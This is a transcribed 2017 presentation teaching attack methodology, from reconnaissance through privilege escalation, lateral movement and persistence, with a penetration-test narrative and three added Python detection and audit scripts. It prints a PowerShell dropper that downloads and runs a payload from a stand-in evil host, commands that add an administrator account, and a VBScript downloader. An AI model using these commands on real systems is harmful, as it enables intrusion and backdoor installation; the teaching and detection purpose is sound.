
Cyber Attack Methodologies

1,146 views

Published on

Presentation to the Geeks Anonymes Liège by Frédéric De Pauw, 29 November 2017

Published in: Internet


  1. Cyber Attacks Methodologies, 29-11-2017, Geeks Anonymes
  2. 1. Objectives; 2. Introduction; 3. Cyber Attack Lifecycle; 4. Vulnerabilities and Exploitation; 5. Social Engineering and Advanced Persistent Threats; 6. Example of a penetration test scenario; 7. Conclusion
  3. Introduction
  4. Introduction
     - Frédéric De Pauw
     - Cyber Security specialist & ethical hacker
     - Head Security Services @NRB
     - Freelance Ethical Hacker (BE – LUX – US)
     - https://be.linkedin.com/in/fdepauw
  5. Introduction
     - What is Cyber Crime?
     - Computer crime, or cybercrime, is crime that involves a computer and a network
     - Two types of Cyber Crime:
       - Technology is the Target: enterprise, state systems, personal systems
       - Technology is the Instrument: criminal activities on the Internet
     - This session is focused on the first type
  6. Introduction (two-column slide)
     - Technology = Target: Distributed Denial of Service; Hacking; Malwares, Ransomwares; Phishing; Hacktivism; Spam; …
     - Technology = Instrument: Child pornography; Incitement to racial hatred; Incitement to terrorism; Money Laundering; Drug selling; …
  7. Introduction: Cyber Crime
     - Has drastically evolved over the past years, following the global evolution of ICT supporting human activity
     - Allows cyber criminals to make profit equivalent to other types of criminality
     - Offers some advantages over other criminal activities: anonymity, discretion, borderless
     - Remains little fought and without international legislation
     - Has evolved to cyber war with state-sponsored attacks
     - Will affect our lives (connected cars, Operational Technologies, IoT)
     - Cost of Cyber Crime in Belgium: 3.5 billion Euros
  8. Introduction: Evolution of Cyber Crime (timeline figure; vertical axis: sophistication)
     - Periods labelled on the horizontal axis: 1985-1995, 2010-2017-…
     - Stages, from least to most sophisticated: Entertainment, First Worms, Phone Hacking, Hacktivism, Virus Spread, Website Defacement, Organized Crime, DDoS, Company Systems Hacking, Data Leak, Industrial Espionage, Cyber War, Targeted Attacks, State-Sponsored Attacks
  9. Introduction: Cyber War – NSA Hacking Tools Leak (2017)
     1. NSA Contractor has NSA Hacking tools on his PC
     2. NSA Contractor installs trojan
     3. NSA Contractor runs full scan
     4. Kaspersky AV discovers malware + NSA hacking tools
     5. Russian spies are somehow aware of the discovery of NSA tools (Kaspersky denies giving info)
     6. Russian Spies further hack contractor PC
  10. Introduction: Cyber War – NSA Hacking Tools Leak
  11. Introduction: Future of Cyber Crime
     - Intensification of targeted cyber attacks against enterprises with important impacts (financial, image, …)
     - Predominance of Advanced Persistent Threats targeting the end user
     - 99% of system compromises will still use unpatched vulnerabilities
     - Intensification of cyber war / cyber espionage activities between nations
     - Increase of cyber crime targeting connected objects and operational technologies: Mirai botnet (2017), hackable cardiac devices (2017), WiFi baby heat monitor device (2017), Jeep SUV hack (2015)
  12. Introduction: Legal evolution
     - General Data Protection Regulation (GDPR): adopted end of 2016, comes into force 25 May 2018
     - Circulars of the National Bank of Belgium: regulation for the financial sector
     - Data breach notification standard: within 72 hours
     - Fines in case of data leak: max 4% of turnover, maximum 20 M€
  13. Cyber Attack Life Cycle
  14. Cyber Attack Lifecycle (diagram)
     1. Reconnaissance: public information, social networks, vulnerability scanning, physical observation
     2. Initial Infection: vulnerabilities, virus / malware, social engineering, physical intrusion
     3. Gain Control: control the infected system
     4. Privilege Escalation: gain elevated privileges on the infected system
     5. Lateral Movement: compromise more systems deeper in the network
     6. Persistence: maintain a persistent connection with infected systems
     7. Malicious Activities: data exfiltration, hacking websites, money extortion, …
  15. Cyber Attack Lifecycle > Reconnaissance
     - The reconnaissance process is a key activity: during this phase crucial information is obtained in order to perform a cyber attack; for instance, the information will be used to determine the best attack vector to use
     - Activities performed:
       - Collect information concerning the target (websites, telephone numbers, general mailboxes, …) through public information
       - Collect information through direct contact such as phone calls (fake poll, job seeker, …)
       - Collect technical information concerning the target information system (exposed systems, partners, data centers, …)
       - Collect information on premises (garbage, WiFi scanning, …)
       - Actively scan enterprise networks exposed on the Internet
  16. Cyber Attack Lifecycle > Reconnaissance
  17. Cyber Attack Lifecycle > Reconnaissance
     - Following reconnaissance activities, attackers must have obtained enough information to determine the best attack vectors for the initial infection phase, for instance:
       - Vulnerabilities affecting systems exposed on the Internet
       - Lack of physical access control at facilities
       - Social engineering attack on profiles selected from, for instance, social network information
  18. Cyber Attack Lifecycle > Initial Infection
     - Initial Infection is aimed at obtaining a first backdoor within the target information system
     - Vectors:
       - Exploiting a vulnerability affecting the victim's system(s)
       - Infection through virus / malware
       - Exploiting a physical vulnerability
  19. Cyber Attack Lifecycle > Initial Infection (perimeter diagram: Public Cloud with SaaS applications, Private Cloud and Corporate Network / On Prem with corporate applications, each layer made of applications, servers / appliances and security technology, and End Users)
  20. Cyber Attack Lifecycle > Initial Infection
  21. Cyber Attack Lifecycle > Initial Infection
     - IDS/IPS bypass: encryption
     - Anti-virus bypass: use simple PowerShell as a dropper which fetches an encrypted payload over the Internet:
       powershell.exe "IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt'))"
     - Unknown viruses: use staging to decouple the payload from the initial dropper; the dropper is injected directly into memory (fileless malware infection)
     - Firewall bypass: use "reverse" connections which connect out to the C&C, e.g. HTTPS passing through the enterprise proxy
  22. Cyber Attack Lifecycle > Initial Infection: Metasploit + SET (Social Engineering Toolkit). Create a Meterpreter backdoor using SET for the payload and Metasploit for the C&C server. Step: create the PowerShell payload
  23. Cyber Attack Lifecycle > Initial Infection: Metasploit + SET (Social Engineering Toolkit). Create a Meterpreter backdoor using SET for the payload and Metasploit for the C&C server. Step: move the payload to the evil web server
  24. Cyber Attack Lifecycle > Initial Infection: Metasploit + SET (Social Engineering Toolkit). Create a Meterpreter backdoor using SET for the payload and Metasploit for the C&C server. Step: create the "Dropper"
  25. Cyber Attack Lifecycle > Initial Infection: Metasploit + SET (Social Engineering Toolkit). Create a Meterpreter backdoor using SET for the payload and Metasploit for the C&C server. Step: start the listener
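Detection logic for the PowerShell dropper shown on slide 21, as an added example that is not part of the original presentation: it scores process-creation events for download-cradle indicators (IEX, DownloadString, -EncodedCommand, hidden window, an Office or web-server parent), decodes any -EncodedCommand argument so the indicators are also matched inside the decoded script, and returns the events worth an analyst's attention. The event fields, the sample events and the indicator weights are constructed assumptions, not a vendor scheme.

```python
"""Triage process-creation events for PowerShell download cradles like the
dropper on slide 21. Added example, not from the original slides: the event
fields, the sample events and the indicator weights are constructed."""
import base64
import re
from dataclasses import dataclass, field

# (name, pattern, weight); weights are an illustrative assumption, not a vendor scheme.
INDICATORS = [(n, re.compile(p, re.I), w) for n, p, w in [
    ("invoke-expression", r"\b(?:iex|invoke-expression)\b", 3),
    ("web-download", r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", 3),
    ("encoded-command", r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", 3),
    ("hidden-window", r"-w(?:indowstyle)?\s+hidden", 1),
    ("no-profile", r"-nop(?:rofile)?\b", 1),
    ("bypass-policy", r"-(?:ep|executionpolicy)\s+bypass", 1),
    ("http-url", r"https?://", 1),
]]
ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)
# Parents that should never spawn PowerShell on a workstation or web server.
UNUSUAL_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "w3wp.exe", "java.exe"}


def decode_encoded_command(cmdline):
    """Plaintext of an -EncodedCommand argument (base64 of UTF-16LE), or '' if absent."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


@dataclass
class Finding:
    host: str
    parent: str
    cmdline: str
    score: int
    hits: list = field(default_factory=list)
    decoded: str = ""


def score_event(event):
    """Score one event; returns None when the image is not PowerShell."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    decoded = decode_encoded_command(event["cmdline"])
    text = event["cmdline"] + "\n" + decoded          # match inside the decoded script too
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    if event["parent"].lower() in UNUSUAL_PARENTS:    # e.g. Word launching the dropper
        hits.append("unusual-parent")
        score += 3
    return Finding(event["host"], event["parent"], event["cmdline"], score, hits, decoded)


def triage(events, threshold=4):
    """Findings at or above the threshold, highest score first."""
    found = [f for f in map(score_event, events) if f is not None and f.score >= threshold]
    return sorted(found, key=lambda f: f.score, reverse=True)


# Constructed sample events (not real telemetry).
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://EvilWebSite/stage2')".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    {"host": "ws-017", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt'))\""},
    {"host": "ws-042", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"host": "srv-bk1", "parent": "taskeng.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
    {"host": "ws-003", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command \"Get-Service | Where-Object Status -eq Running\""},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f.host, f.score, f.hits)
```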
  26. Cyber Attack Lifecycle > Gain Control
     - Once the initial infection is performed, the objective is to get control over the machine
     - For this a network connection must be established between the victim and the Command & Control server
     - In general a "reverse" connection is made to bypass inbound firewall protection
     - Several techniques exist to bypass outbound filtering (if present)
  27. Cyber Attack Lifecycle > Gain Control
     - Standard enterprise security principles for outbound filtering:
       - Default policy is to deny all outbound connections
       - Allowed outbound connections must go through a proxy
       - Outbound connections must conform to the expected protocol
       - Outbound connections must pass other checks as well
     - Examples of outbound filtering evasion techniques:
       - Reverse HTTP and / or HTTPS traffic (with or without proxy settings verification)
       - Payload staging over DNS by setting the payload into TXT records of a domain
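Detection logic for the DNS TXT staging technique on slide 27, as an added example that is not part of the original presentation: it groups TXT answers per client and registered domain and flags groups with many queries carrying a large volume of high-entropy data, while skipping SPF, DKIM and DMARC records that legitimately carry long base64 strings. The log line format, the thresholds and the sample lines are constructed assumptions.

```python
"""Flag DNS TXT lookups that look like payload staging over DNS (slide 27):
many TXT answers under one domain carrying a large volume of high-entropy data.
Added example, not from the original slides: the log line format, the
thresholds and the sample lines are constructed assumptions."""
import base64
import hashlib
import math
import re
from collections import Counter, defaultdict

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "(.*)"$')   # ts client qname qtype "rdata"
# Structured records that legitimately carry long base64 data (DKIM keys in particular).
KNOWN_PREFIXES = ("v=spf1", "v=dkim1", "v=dmarc1")


def shannon_entropy(s):
    """Bits per character; random base64 text scores close to 6.0, English text around 4."""
    n = len(s)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registered_domain(qname):
    """Crude last-two-label grouping; production code should use the public suffix list."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparsable DNS log line: {line!r}")
    ts, client, qname, qtype, rdata = m.groups()
    return {"ts": ts, "client": client, "qname": qname, "qtype": qtype.upper(), "rdata": rdata}


def detect_txt_staging(lines, min_queries=3, min_bytes=512, min_entropy=4.8):
    """Return one alert per (client, domain) whose TXT answers exceed all three thresholds."""
    groups = defaultdict(list)                        # (client, domain) -> [rdata, ...]
    for rec in map(parse_line, lines):
        if rec["qtype"] != "TXT" or rec["rdata"].lower().startswith(KNOWN_PREFIXES):
            continue
        groups[(rec["client"], registered_domain(rec["qname"]))].append(rec["rdata"])
    alerts = []
    for (client, domain), answers in groups.items():
        total = sum(len(a) for a in answers)
        mean_entropy = sum(shannon_entropy(a) for a in answers) / len(answers)
        if len(answers) >= min_queries and total >= min_bytes and mean_entropy >= min_entropy:
            alerts.append({"client": client, "domain": domain, "queries": len(answers),
                           "bytes": total, "entropy": round(mean_entropy, 2)})
    return alerts


def _chunk(i):
    """Constructed stand-in for one staged chunk: 252 base64 chars of hash output, no real payload."""
    blob = b"".join(hashlib.sha256(f"chunk{i}-{j}".encode()).digest() for j in range(6))[:189]
    return base64.b64encode(blob).decode()


# Constructed sample log: SPF, a DKIM key, a site-verification token, then four staging chunks.
SAMPLE_LOG = [
    '2017-11-29T10:00:01 10.1.2.3 example.org TXT "v=spf1 include:_spf.example.org -all"',
    '2017-11-29T10:00:02 10.1.2.3 mail._domainkey.example.com TXT "v=DKIM1; k=rsa; p=' + _chunk(99) + '"',
    '2017-11-29T10:00:03 10.1.2.3 example.org TXT "google-site-verification=' + "x" * 40 + '"',
] + [f'2017-11-29T10:01:0{i} 10.1.2.3 c{i}.stg.example.net TXT "{_chunk(i)}"' for i in range(4)]

if __name__ == "__main__":
    for alert in detect_txt_staging(SAMPLE_LOG):
        print(alert)
```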
  28. Cyber Attack Lifecycle > Gain Control: Metasploit / Meterpreter
     - Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
  29. Cyber Attack Lifecycle > Privilege Escalation
     - Escalate privileges from infected machines in order to gain elevated access; the typical example is getting Administrator privileges
     - Several techniques:
       - "Local exploits" of local applications on the infected machine
       - Manual search for credentials in scripts
       - Password hash dump (e.g. SAM, /etc/passwd) and cracking
       - Authenticated session grabbing (e.g. VPN sessions)
       - LSASS process dump (Mimikatz)
       - SSH keys
       - World-writable files
       - Reading command history files
       - Batches / jobs alteration
       - Process injection: try injecting malicious code into processes running under a "Domain Admin" privileged user
  30. Cyber Attack Lifecycle > Privilege Escalation: Metasploit "Incognito" module
     - Allows impersonating authentication tokens on compromised Windows hosts
     - The backdoor must run under "SYSTEM" or "Administrator" privilege in order to see interesting authentication tokens
     - TIP: file servers are virtual treasure troves of tokens since most file servers are used as network attached drives via domain logon scripts
  31. Cyber Attack Lifecycle > Lateral Movement
     - From infected systems, try to infect more systems deeper in the network
     - Basically repeat the cyber attack lifecycle process (recon, initial infection, privilege escalation, …)
     - Aim for high-value systems: Windows domain controllers, file servers, …
     - Techniques:
       - Credential re-use / pass-the-hash / SSH key re-use
       - Internal application vulnerabilities (less often patched)
       - Network segmentation issues between environments (e.g. port 445): PsExec with pass-the-hash
  32. Cyber Attack Lifecycle > Lateral Movement: Metasploit pivoting technique
     - Basically using the first compromise to allow and even aid in the compromise of other, otherwise inaccessible systems
  33. Cyber Attack Lifecycle > Lateral Movement: Metasploit pivoting technique
     - Use autoroute to make the compromised host a pivot to other networks
  34. Cyber Attack Lifecycle > Lateral Movement: Metasploit pivoting technique
     - Scan the network through the route created on ports 139 & 445
  35. Cyber Attack Lifecycle > Lateral Movement: Metasploit pivoting technique
     - Start a new session on a new host using PsExec and the "pass-the-hash" technique, re-using the local Administrator password hash
  36. Cyber Attack Lifecycle > Maintain Persistence
     - Prevent loss of connection between infected machines and the C&C
     - Techniques:
       - Create jobs / scheduled tasks
       - Create a service running on startup
       - Use AppInit DLLs (disabled in Windows 8 with Secure Boot enabled)
       - Bootkit / rootkit
       - Default file association
       - Logon scripts
       - Modification of applications / services
       - Registry RUN keys
  37. Cyber Attack Lifecycle > Maintain Persistence: Metasploit persistence module
     - Create a Meterpreter service which will start when the compromised host boots
  38. Cyber Attack Lifecycle > Maintain Persistence: Metasploit persistence module
     - Create a Meterpreter service which will start when the compromised host boots
  39. Cyber Attack Lifecycle > Demo: social engineering scenario
     - Send a "virus" to the victim which consists of a Metasploit Meterpreter instance, undetected by up-to-date commercial antivirus
     - Steps: 1. Prepare malware & environment; 2. Send malware; 3. Execute malware; 4. Get infected & contact C&C; 5. Interact
  40. Vulnerabilities and Exploitation
  41. Vulnerabilities and Exploitation
     - A vulnerability is a flaw in a system which allows a malicious user to compromise its confidentiality, integrity and / or availability
     - Simple: default password. Complex: buffer overflow in an application
     - Dozens of new vulnerabilities are officially classified every day: http://www.cvedetails.com
     - Dozens of others are not disclosed! 0DAY: vulnerabilities not discovered, or not disclosed
     - Vulnerabilities are discovered by:
       - Researchers, students (ethical hackers)
       - Professional researchers (vulnerability brokers): http://www.zerodayinitiative.com/ ; France: Vupen Security sells vulnerabilities to NASA
       - Cyber criminals (0DAYS)
  42. Vulnerabilities and Exploitation
     - Full disclosure principle: vulnerabilities are reported and published publicly as soon as discovered, without taking into account whether a patch is available
     - Responsible disclosure principle: vendors are notified first; the vulnerability is publicly disclosed after 45 days
     - Websites with vulnerabilities and associated exploits: www.securityfocus.com, www.1337day.com (not free), http://www.cvedetails.com/, http://www.exploit-db.com/, underground websites on the TOR network
     - Conferences: defcon.org (US), brucon.be (BE), hack.lu (LU), hackitoergosum.org (FR), ccc.de (DE), blackhat.com (US)
  43. Vulnerabilities and Exploitation: HTTPS://0day.today/
  44. Vulnerabilities and Exploitation
     - Complexity of systems, application code, communication flows, network segmentation
     - Out-of-the-box vulnerabilities of vendor solutions, lack of security configuration: the Next->Next->Next syndrome
     - Lack of secure coding awareness: OWASP Top 10
     - Lack of enforcement of security during IT projects: security implies cost and time; need for functionality <-> need for security; blacklist mode; learning mode
  45. Social Engineering and Advanced Persistent Threats
  46. Human Vulnerabilities / Social Engineering
     - Social engineering is the preferred attack vector as it is generally easier to bypass preventive security measures
     - Targets can be the company employees but also partners / subcontractors
     - Two types of social engineering: human SE and technical SE
  47. Human Vulnerabilities / Social Engineering
     - Technical SE is aimed at compromising end user systems
     - Transmission of the malware follows "authorized" routes, such as e-mail and/or web browsing, bypassing security measures such as perimeter security, firewalls, …
     - Two phases: 1. Infection; 2. Control
  48. Human Vulnerabilities / Social Engineering: attack methodologies
     - Encourage users to install tools such as "TeamViewer" or "LogMeIn"
     - Send malware through e-mail: Word/Excel with malicious macros; PDF files exploiting PDF vulnerabilities
     - Send mail containing links to malicious web sites
     - Send phishing SMS on smartphones (SMShing)
     - Drop USB keys containing viruses (STUXNET)
     - USB gadgets configured to simulate a keyboard
  49. Human Vulnerabilities / Social Engineering: USB gadgets
     - Nowadays systems are in general protected against USB infection through the autorun functionality
     - New method: "Hacker Interface Devices". Attackers embed malicious code within USB gadgets; once connected, those gadgets simulate being a keyboard and start sending commands to the computer (keystroke injection). Those commands can drop a malware as easily as other techniques.
     - Ref: http://hakshop.myshopify.com/products/usb-rubber-ducky-deluxe
  50. Penetration test example
  51. Penetration test example
     - Context: black box intrusion test
     - Scope: external-facing systems
     - (diagram) Web servers, ports 80 (HTTP) and 443 (HTTPS); DMZ; Intranet; Enterprise Windows Domain; Internal Network
  52. Penetration test example
     - VULN 1/2: vulnerable deployment of SAP BO (Apache Axis2)
       - CVE-2010-0219, Apache Axis2 default credentials
       - http://www.securityfocus.com/bid/40343, Apache Axis2 directory traversal
     - See earlier: vuln "Directory Traversal", vuln "Default Password"
     - Allows obtaining admin credentials to Axis2
  53. Penetration test example
  54. Penetration test example
     - Access to the Axis2 administration allows uploading a web service and LIVE deployment of it
  55. Penetration test example
     - A Metasploit module exists to exploit this vuln: Axis2 / SAP BusinessObjects Authenticated Code Execution, http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer
     - We use it to deploy a reverse shell backdoor on the server to connect back to port 80
     - VULN 3: the server is allowed to contact any host on the Internet on ports 80 and 443
     - (diagram) Web servers, ports 80 (HTTP) and 443 (HTTPS); DMZ; Intranet; Enterprise Windows Domain; Internal Network; C&C server on port 80
  56. Penetration test example
     - Not possible to upload a Meterpreter (killed by the AV on the machine)
     - Possible to upload a backdoor which sends me back a DOS command prompt on the server
  57. Penetration test example
     - Next steps: create a privileged account on the server
     - VULN 4: the application server is running under ADMIN privileges
       Net user temptest password /add
       Net localgroup Administrators hacked /add
     - Obtain a Remote Desktop connection. Problem: port 3389 is closed inbound. Solution: create a reverse SSH tunnel with reverse port-forwarding on port 3389
     - (diagram) Web servers; C&C server on port 80; SSH server on port 443; reverse SSH tunnel over port 443 carrying port 3389
  58. Penetration test example
     - To create the tunnel, I need to download an SSH client on the server using the DOS command prompt
     - I create a VBScript script using the "Echo" command, then execute the VBScript:
       Echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> dl.vbs
       Cscript dl.vbs
     - Use plink to create the tunnel
     - Content of dl.vbs:
       dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
       dim bStrm: Set bStrm = createobject("Adodb.Stream")
       xHttp.Open "GET", "http://www.putty.com/plink.exe", False
       xHttp.Send
       with bStrm
         .type = 1 '//binary
         .open
         .write xHttp.responseBody
         .savetofile "c:\temp\plink.exe", 2 '//overwrite
       end with
  59. Penetration test example
     - (diagram) Web servers; C&C server on port 80; SSH server on port 443; reverse SSH tunnel over port 443 carrying port 3389
     - Connect to RDP through the tunnel and use the user account I just created to connect: temptest / password
  60. Penetration test example
     - Next step: lateral movement, the simplest first: credential reuse
     - I need to crack all passwords present locally on the infected server
     - VULN 6/7: Windows 2003 design vulnerabilities
       - VULN 6: the "Repair" directory contains a SAM backup file containing credentials encrypted using LMHASH
       - VULN 7: the LMHASH encryption algorithm is broken and can be cracked easily
  61. Penetration test example
     - After some minutes
  62. Penetration test example
     - VULN 8: the local Administrator password is replicated over all systems in the DMZ
     - (diagram) Web servers (several); C&C server on port 80; SSH server on port 443; reverse SSH tunnel over port 443; port 3389
  63. Penetration test example
     - Next step: try to hit the internal network
     - VULN 9: DMZ systems are members of the internal Windows domain. This means that critical ports (e.g. 139, 445, …) must be open between the DMZ and the internal network
     - VULN 10: password replication bis: a Domain Admin user account whose name is identical to a local account has the same password
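An audit for the credential weaknesses behind VULN 6 to VULN 10 (LM hashes still stored, the local Administrator password replicated across DMZ hosts, and a domain account sharing its password with a local account), as an added example that is not part of the original presentation: it compares dumped hashes without cracking anything, since identical NT hashes mean identical passwords. The pwdump-style format and every hash value are constructed, except the two well-known empty-password hashes.

```python
"""Audit dumped Windows password hashes for the weaknesses behind VULN 6 to
VULN 10: LM hashes still stored, one local Administrator password replicated
across DMZ hosts, and a domain account sharing its password with a local
account. Added example, not from the original slides: the pwdump-style
lines (user:rid:lmhash:nthash:::) and every hash value are constructed,
except the two well-known empty-password hashes."""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty password (no LM stored)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password


def parse_dump(lines):
    """Yield (account, lm, nt) from pwdump-style lines; 'DOMAIN\\user' becomes 'user'."""
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            raise ValueError(f"malformed dump line: {line!r}")
        account = fields[0].rsplit("\\", 1)[-1].lower()
        yield account, fields[2].lower(), fields[3].lower()


def audit(host_dumps, domain_dump):
    """Return (finding, account/host, detail) tuples; identical NT hashes mean identical passwords."""
    findings = []
    nt_by_account = defaultdict(lambda: defaultdict(list))   # account -> nt hash -> [hosts]
    for host, lines in host_dumps.items():
        for account, lm, nt in parse_dump(lines):
            if lm != EMPTY_LM:                                 # VULN 6/7: LM hash still stored
                findings.append(("lm-hash-present", host, account))
            if nt != EMPTY_NT:                                 # empty passwords would match trivially
                nt_by_account[account][nt].append(host)
    for account, by_nt in nt_by_account.items():               # VULN 8: same local password on many hosts
        for hosts in by_nt.values():
            if len(hosts) > 1:
                findings.append(("local-password-replicated", account, sorted(hosts)))
    for account, _lm, nt in parse_dump(domain_dump):           # VULN 10: domain password reused locally
        hosts = nt_by_account.get(account, {}).get(nt, [])
        if hosts:
            findings.append(("domain-local-reuse", account, sorted(hosts)))
    return findings


# Constructed dumps: hash values are placeholders, only their equality matters.
H_ADMIN, H_SVC, H_OTHER, H_DOMADM = "a" * 32, "b" * 32, "c" * 32, "d" * 32
HOST_DUMPS = {
    "web01": [f"Administrator:500:{'f' * 32}:{H_ADMIN}:::",     # LM hash present
              f"Guest:501:{EMPTY_LM}:{EMPTY_NT}:::",
              f"svc_app:1001:{EMPTY_LM}:{H_SVC}:::"],
    "web02": [f"Administrator:500:{EMPTY_LM}:{H_ADMIN}:::",
              f"svc_app:1001:{EMPTY_LM}:{H_OTHER}:::"],
    "web03": [f"Administrator:500:{EMPTY_LM}:{H_ADMIN}:::"],
}
DOMAIN_DUMP = [f"CORP\\Administrator:500:{EMPTY_LM}:{H_DOMADM}:::",
               f"CORP\\svc_app:1105:{EMPTY_LM}:{H_SVC}:::"]

if __name__ == "__main__":
    for finding in audit(HOST_DUMPS, DOMAIN_DUMP):
        print(*finding)
```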
  64. Penetration test example
     - I connect to the Domain Controller from the DMZ using the Domain Admin account. I am now Domain Administrator and have full control over the Enterprise Domain
     - (diagram) Web servers, ports 80 (HTTP) and 443 (HTTPS); DMZ; Intranet; Enterprise Windows Domain; Domain Controller
  65. Conclusion
